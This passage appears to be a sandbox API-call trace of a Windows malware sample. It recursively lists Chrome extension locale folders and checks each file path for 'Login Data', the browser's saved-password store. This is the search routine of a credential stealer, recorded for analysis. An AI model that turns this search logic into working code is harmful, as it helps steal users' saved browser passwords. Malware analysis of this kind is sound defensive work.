Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\ru" [0161.762] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\ru", lpString2="\\" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\ru\\") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\ru\\" [0161.762] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\ru\\") returned 138 [0161.762] lstrlenW (lpString="messages.json") returned 13 [0161.762] GetProcessHeap () returned 0x8e0000 [0161.762] RtlAllocateHeap (HeapHandle=0x8e0000, Flags=0x8, Size=0x130) returned 0x91b2f8 [0161.762] lstrcatW (in: lpString1="", lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\ru\\" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\ru\\") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\ru\\" [0161.762] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\ru\\", lpString2="messages.json" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\ru\\messages.json") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\ru\\messages.json" [0161.762] VirtualQuery (in: lpAddress=0x91b1d8, lpBuffer=0x2de6b0, dwLength=0x1c | out: lpBuffer=0x2de6b0*(BaseAddress=0x91b000, AllocationBase=0x8e0000, AllocationProtect=0x4, RegionSize=0xc000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0161.763] GetProcessHeap () returned 0x8e0000 [0161.763] HeapFree (in: hHeap=0x8e0000, dwFlags=0x0, lpMem=0x91b1d8 | out: hHeap=0x8e0000) returned 1 [0161.763] StrStrIW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\ru\\messages.json", lpSrch="Login Data") returned 0x0 [0161.763] VirtualQuery (in: lpAddress=0x91b2f8, lpBuffer=0x2de6bc, dwLength=0x1c | out: lpBuffer=0x2de6bc*(BaseAddress=0x91b000, AllocationBase=0x8e0000, AllocationProtect=0x4, RegionSize=0xc000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0161.763] GetProcessHeap () returned 0x8e0000 [0161.763] HeapFree (in: hHeap=0x8e0000, dwFlags=0x0, lpMem=0x91b2f8 | out: hHeap=0x8e0000) returned 1 [0161.763] FindNextFileW (in: hFindFile=0x8f9c00, lpFindFileData=0x2de700 | out: lpFindFileData=0x2de700*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x86690330, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x8668fb60, ftLastAccessTime.dwHighDateTime=0x1d2dd9e, ftLastWriteTime.dwLowDateTime=0x86833250, ftLastWriteTime.dwHighDateTime=0x1d2dd9e, nFileSizeHigh=0x0, nFileSizeLow=0x10a, dwReserved0=0x69006c, dwReserved1=0x690065, cFileName="messages.json", cAlternateFileName="MESSAG~1.JSO")) returned 0 [0161.763] FindClose (in: hFindFile=0x8f9c00 | out: hFindFile=0x8f9c00) returned 1 [0161.763] VirtualQuery (in: lpAddress=0x91a0a8, lpBuffer=0x2de6bc, dwLength=0x1c | out: lpBuffer=0x2de6bc*(BaseAddress=0x91a000, AllocationBase=0x8e0000, AllocationProtect=0x4, RegionSize=0xd000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0161.763] GetProcessHeap () returned 0x8e0000 [0161.763] HeapFree (in: hHeap=0x8e0000, dwFlags=0x0, lpMem=0x91a0a8 | out: hHeap=0x8e0000) returned 1 [0161.763] VirtualQuery (in: lpAddress=0x925dd8, lpBuffer=0x2de934, dwLength=0x1c | out: lpBuffer=0x2de934*(BaseAddress=0x925000, AllocationBase=0x8e0000, AllocationProtect=0x4, RegionSize=0x2000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0161.763] GetProcessHeap () returned 0x8e0000 [0161.763] HeapFree (in: hHeap=0x8e0000, dwFlags=0x0, lpMem=0x925dd8 | out: hHeap=0x8e0000) returned 1 [0161.763] FindNextFileW (in: hFindFile=0x8f9bc0, lpFindFileData=0x2de978 | out: lpFindFileData=0x2de978*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x866b6490, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x866b6490, ftLastAccessTime.dwHighDateTime=0x1d2dd9e, ftLastWriteTime.dwLowDateTime=0x866b6490, ftLastWriteTime.dwHighDateTime=0x1d2dd9e, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x69006c, dwReserved1=0x690065, cFileName="sk", cAlternateFileName="")) returned 1 [0161.763] lstrcmpiW (lpString1="sk", lpString2=".") returned 1 [0161.763] lstrcmpiW (lpString1="sk", lpString2="..") returned 1 [0161.763] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales") returned 134 [0161.763] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales") returned 134 [0161.763] lstrlenW (lpString="\\") returned 1 [0161.763] GetProcessHeap () returned 0x8e0000 [0161.763] RtlAllocateHeap (HeapHandle=0x8e0000, Flags=0x8, Size=0x110) returned 0x925cc0 [0161.763] lstrcatW (in: lpString1="", lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales" [0161.763] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales", lpString2="\\" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\" [0161.763] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\") returned 135 [0161.763] lstrlenW (lpString="sk") returned 2 [0161.763] GetProcessHeap () returned 0x8e0000 [0161.763] RtlAllocateHeap (HeapHandle=0x8e0000, Flags=0x8, Size=0x114) returned 0x925dd8 [0161.763] lstrcatW (in: lpString1="", lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\" [0161.763] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\", lpString2="sk" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\sk") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\sk" [0161.763] VirtualQuery (in: lpAddress=0x925cc0, lpBuffer=0x2de928, dwLength=0x1c | out: lpBuffer=0x2de928*(BaseAddress=0x925000, AllocationBase=0x8e0000, AllocationProtect=0x4, RegionSize=0x2000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0161.763] GetProcessHeap () returned 0x8e0000 [0161.763] HeapFree (in: hHeap=0x8e0000, dwFlags=0x0, lpMem=0x925cc0 | out: hHeap=0x8e0000) returned 1 [0161.764] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\sk") returned 137 [0161.764] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\sk") returned 137 [0161.764] lstrlenW (lpString="\\*.*") returned 4 [0161.764] GetProcessHeap () returned 0x8e0000 [0161.764] RtlAllocateHeap (HeapHandle=0x8e0000, Flags=0x8, Size=0x11c) returned 0x91a0a8 [0161.764] lstrcatW (in: lpString1="", lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\sk" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\sk") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\sk" [0161.764] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\sk", lpString2="\\*.*" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\sk\\*.*") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\sk\\*.*" [0161.764] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\sk\\*.*", lpFindFileData=0x2de700 | out: lpFindFileData=0x2de700*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x866b6490, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x866b6490, ftLastAccessTime.dwHighDateTime=0x1d2dd9e, ftLastWriteTime.dwLowDateTime=0x866b6490, ftLastWriteTime.dwHighDateTime=0x1d2dd9e, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x69006c, dwReserved1=0x690065, cFileName=".", cAlternateFileName="")) returned 0x8f9c00 [0161.764] lstrcmpiW (lpString1=".", lpString2=".") returned 0 [0161.764] FindNextFileW (in: hFindFile=0x8f9c00, lpFindFileData=0x2de700 | out: lpFindFileData=0x2de700*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x866b6490, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x866b6490, ftLastAccessTime.dwHighDateTime=0x1d2dd9e, ftLastWriteTime.dwLowDateTime=0x866b6490, ftLastWriteTime.dwHighDateTime=0x1d2dd9e, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x69006c, dwReserved1=0x690065, cFileName="..", cAlternateFileName="")) returned 1 [0161.764] lstrcmpiW (lpString1="..", lpString2=".") returned 1 [0161.764] lstrcmpiW (lpString1="..", lpString2="..") returned 0 [0161.764] FindNextFileW (in: hFindFile=0x8f9c00, lpFindFileData=0x2de700 | out: lpFindFileData=0x2de700*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x866b6490, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x866b6c60, ftLastAccessTime.dwHighDateTime=0x1d2dd9e, ftLastWriteTime.dwLowDateTime=0x86833250, ftLastWriteTime.dwHighDateTime=0x1d2dd9e, nFileSizeHigh=0x0, nFileSizeLow=0xdd, dwReserved0=0x69006c, dwReserved1=0x690065, cFileName="messages.json", cAlternateFileName="MESSAG~1.JSO")) returned 1 [0161.764] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\sk") returned 137 [0161.764] lstrlenW (lpString="\\") returned 1 [0161.764] GetProcessHeap () returned 0x8e0000 [0161.764] RtlAllocateHeap (HeapHandle=0x8e0000, Flags=0x8, Size=0x116) returned 0x91b1d8 [0161.764] lstrcatW (in: lpString1="", lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\sk" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\sk") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\sk" [0161.764] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\sk", lpString2="\\" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\sk\\") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\sk\\" [0161.764] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\sk\\") returned 138 [0161.764] lstrlenW (lpString="messages.json") returned 13 [0161.764] GetProcessHeap () returned 0x8e0000 [0161.764] RtlAllocateHeap (HeapHandle=0x8e0000, Flags=0x8, Size=0x130) returned 0x91b2f8 [0161.764] lstrcatW (in: lpString1="", lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\sk\\" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\sk\\") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\sk\\" [0161.765] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\sk\\", lpString2="messages.json" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\sk\\messages.json") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\sk\\messages.json" [0161.765] VirtualQuery (in: lpAddress=0x91b1d8, lpBuffer=0x2de6b0, dwLength=0x1c | out: lpBuffer=0x2de6b0*(BaseAddress=0x91b000, AllocationBase=0x8e0000, AllocationProtect=0x4, RegionSize=0xc000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0161.765] GetProcessHeap () returned 0x8e0000 [0161.765] HeapFree (in: hHeap=0x8e0000, dwFlags=0x0, lpMem=0x91b1d8 | out: hHeap=0x8e0000) returned 1 [0161.765] StrStrIW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\sk\\messages.json", lpSrch="Login Data") returned 0x0 [0161.765] VirtualQuery (in: lpAddress=0x91b2f8, lpBuffer=0x2de6bc, dwLength=0x1c | out: lpBuffer=0x2de6bc*(BaseAddress=0x91b000, AllocationBase=0x8e0000, AllocationProtect=0x4, RegionSize=0xc000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0161.765] GetProcessHeap () returned 0x8e0000 [0161.765] HeapFree (in: hHeap=0x8e0000, dwFlags=0x0, lpMem=0x91b2f8 | out: hHeap=0x8e0000) returned 1 [0161.765] FindNextFileW (in: hFindFile=0x8f9c00, lpFindFileData=0x2de700 | out: lpFindFileData=0x2de700*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x866b6490, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x866b6c60, ftLastAccessTime.dwHighDateTime=0x1d2dd9e, ftLastWriteTime.dwLowDateTime=0x86833250, ftLastWriteTime.dwHighDateTime=0x1d2dd9e, nFileSizeHigh=0x0, nFileSizeLow=0xdd, dwReserved0=0x69006c, dwReserved1=0x690065, cFileName="messages.json", cAlternateFileName="MESSAG~1.JSO")) returned 0 [0161.765] FindClose (in: hFindFile=0x8f9c00 | out: hFindFile=0x8f9c00) returned 1 [0161.765] VirtualQuery (in: lpAddress=0x91a0a8, lpBuffer=0x2de6bc, dwLength=0x1c | out: lpBuffer=0x2de6bc*(BaseAddress=0x91a000, AllocationBase=0x8e0000, AllocationProtect=0x4, RegionSize=0xd000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0161.765] GetProcessHeap () returned 0x8e0000 [0161.765] HeapFree (in: hHeap=0x8e0000, dwFlags=0x0, lpMem=0x91a0a8 | out: hHeap=0x8e0000) returned 1 [0161.765] FindNextFileW (in: hFindFile=0x8f9bc0, lpFindFileData=0x2de978 | out: lpFindFileData=0x2de978*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x866b6490, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x866b6490, ftLastAccessTime.dwHighDateTime=0x1d2dd9e, ftLastWriteTime.dwLowDateTime=0x866b6490, ftLastWriteTime.dwHighDateTime=0x1d2dd9e, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x69006c, dwReserved1=0x690065, cFileName="sl", cAlternateFileName="")) returned 1 [0161.765] lstrcmpiW (lpString1="sl", lpString2=".") returned 1 [0161.765] lstrcmpiW (lpString1="sl", lpString2="..") returned 1 [0161.766] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales") returned 134 [0161.766] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales") returned 134 [0161.766] lstrlenW (lpString="\\") returned 1 [0161.766] GetProcessHeap () returned 0x8e0000 [0161.766] RtlAllocateHeap (HeapHandle=0x8e0000, Flags=0x8, Size=0x110) returned 0x925cc0 [0161.766] lstrcatW (in: lpString1="", lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales" [0161.766] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales", lpString2="\\" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\" [0161.766] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\") returned 135 [0161.766] lstrlenW (lpString="sl") returned 2 [0161.769] lstrcmpiW (lpString1=".", lpString2=".") returned 0 [0161.769] FindNextFileW (in: hFindFile=0x8f9c00, lpFindFileData=0x2de700 | out: lpFindFileData=0x2de700*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x866b6490, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x866b6490, ftLastAccessTime.dwHighDateTime=0x1d2dd9e, ftLastWriteTime.dwLowDateTime=0x866b6490, ftLastWriteTime.dwHighDateTime=0x1d2dd9e, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x69006c, dwReserved1=0x690065, cFileName="..", cAlternateFileName="")) returned 1 [0161.769] lstrcmpiW (lpString1="..", lpString2=".") returned 1 [0161.769] lstrcmpiW (lpString1="..", lpString2="..") returned 0 [0161.769] FindNextFileW (in: hFindFile=0x8f9c00, lpFindFileData=0x2de700 | out: lpFindFileData=0x2de700*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x866b6490, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x866b6c60, ftLastAccessTime.dwHighDateTime=0x1d2dd9e, ftLastWriteTime.dwLowDateTime=0x86833250, ftLastWriteTime.dwHighDateTime=0x1d2dd9e, nFileSizeHigh=0x0, nFileSizeLow=0xda, dwReserved0=0x69006c, dwReserved1=0x690065, cFileName="messages.json", cAlternateFileName="MESSAG~1.JSO")) returned 1 [0161.769] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\sl") returned 137 [0161.769] lstrlenW (lpString="\\") returned 1 [0161.769] StrStrIW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\sl\\messages.json", lpSrch="Login Data") returned 0x0 [0161.769] FindNextFileW (in: hFindFile=0x8f9c00, lpFindFileData=0x2de700 | out: lpFindFileData=0x2de700*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x866b6490, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x866b6c60, ftLastAccessTime.dwHighDateTime=0x1d2dd9e, ftLastWriteTime.dwLowDateTime=0x86833250, ftLastWriteTime.dwHighDateTime=0x1d2dd9e, nFileSizeHigh=0x0, nFileSizeLow=0xda, dwReserved0=0x69006c, dwReserved1=0x690065, cFileName="messages.json", cAlternateFileName="MESSAG~1.JSO")) returned 0 [0161.769] FindClose (in: hFindFile=0x8f9c00 | out: hFindFile=0x8f9c00) returned 1 [0161.769] FindNextFileW (in: hFindFile=0x8f9bc0, lpFindFileData=0x2de978 | out: lpFindFileData=0x2de978*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x866dc5f0, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x866dc5f0, ftLastAccessTime.dwHighDateTime=0x1d2dd9e, ftLastWriteTime.dwLowDateTime=0x866dc5f0, ftLastWriteTime.dwHighDateTime=0x1d2dd9e, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x69006c, dwReserved1=0x690065, cFileName="sr", cAlternateFileName="")) returned 1 [0161.769] lstrcmpiW (lpString1="sr", lpString2=".") returned 1 [0161.769] lstrcmpiW (lpString1="sr", lpString2="..") returned 1 [0161.769] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales") returned 134 [0161.770] lstrcmpiW (lpString1=".", lpString2=".") returned 0 [0161.770] FindNextFileW (in: hFindFile=0x8f9c00, lpFindFileData=0x2de700 | out: lpFindFileData=0x2de700*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x866dc5f0, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x866dc5f0, ftLastAccessTime.dwHighDateTime=0x1d2dd9e, ftLastWriteTime.dwLowDateTime=0x866dc5f0, ftLastWriteTime.dwHighDateTime=0x1d2dd9e, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x69006c, dwReserved1=0x690065, cFileName="..", cAlternateFileName="")) returned 1 [0161.770] lstrcmpiW (lpString1="..", lpString2=".") returned 1 [0161.770] lstrcmpiW (lpString1="..", lpString2="..") returned 0 [0161.770] FindNextFileW (in: hFindFile=0x8f9c00, lpFindFileData=0x2de700 | out: lpFindFileData=0x2de700*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x866dc5f0, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x866db650, ftLastAccessTime.dwHighDateTime=0x1d2dd9e, ftLastWriteTime.dwLowDateTime=0x86833250, ftLastWriteTime.dwHighDateTime=0x1d2dd9e, nFileSizeHigh=0x0, nFileSizeLow=0xf8, dwReserved0=0x69006c, dwReserved1=0x690065, cFileName="messages.json", cAlternateFileName="MESSAG~1.JSO")) returned 1 [0161.770] StrStrIW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\sr\\messages.json", lpSrch="Login Data") returned 0x0 [0161.770] FindNextFileW (in: hFindFile=0x8f9c00, lpFindFileData=0x2de700 | out: lpFindFileData=0x2de700*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x866dc5f0, ftCreationTime.dwHighDateTime=0x1d2dd9e, 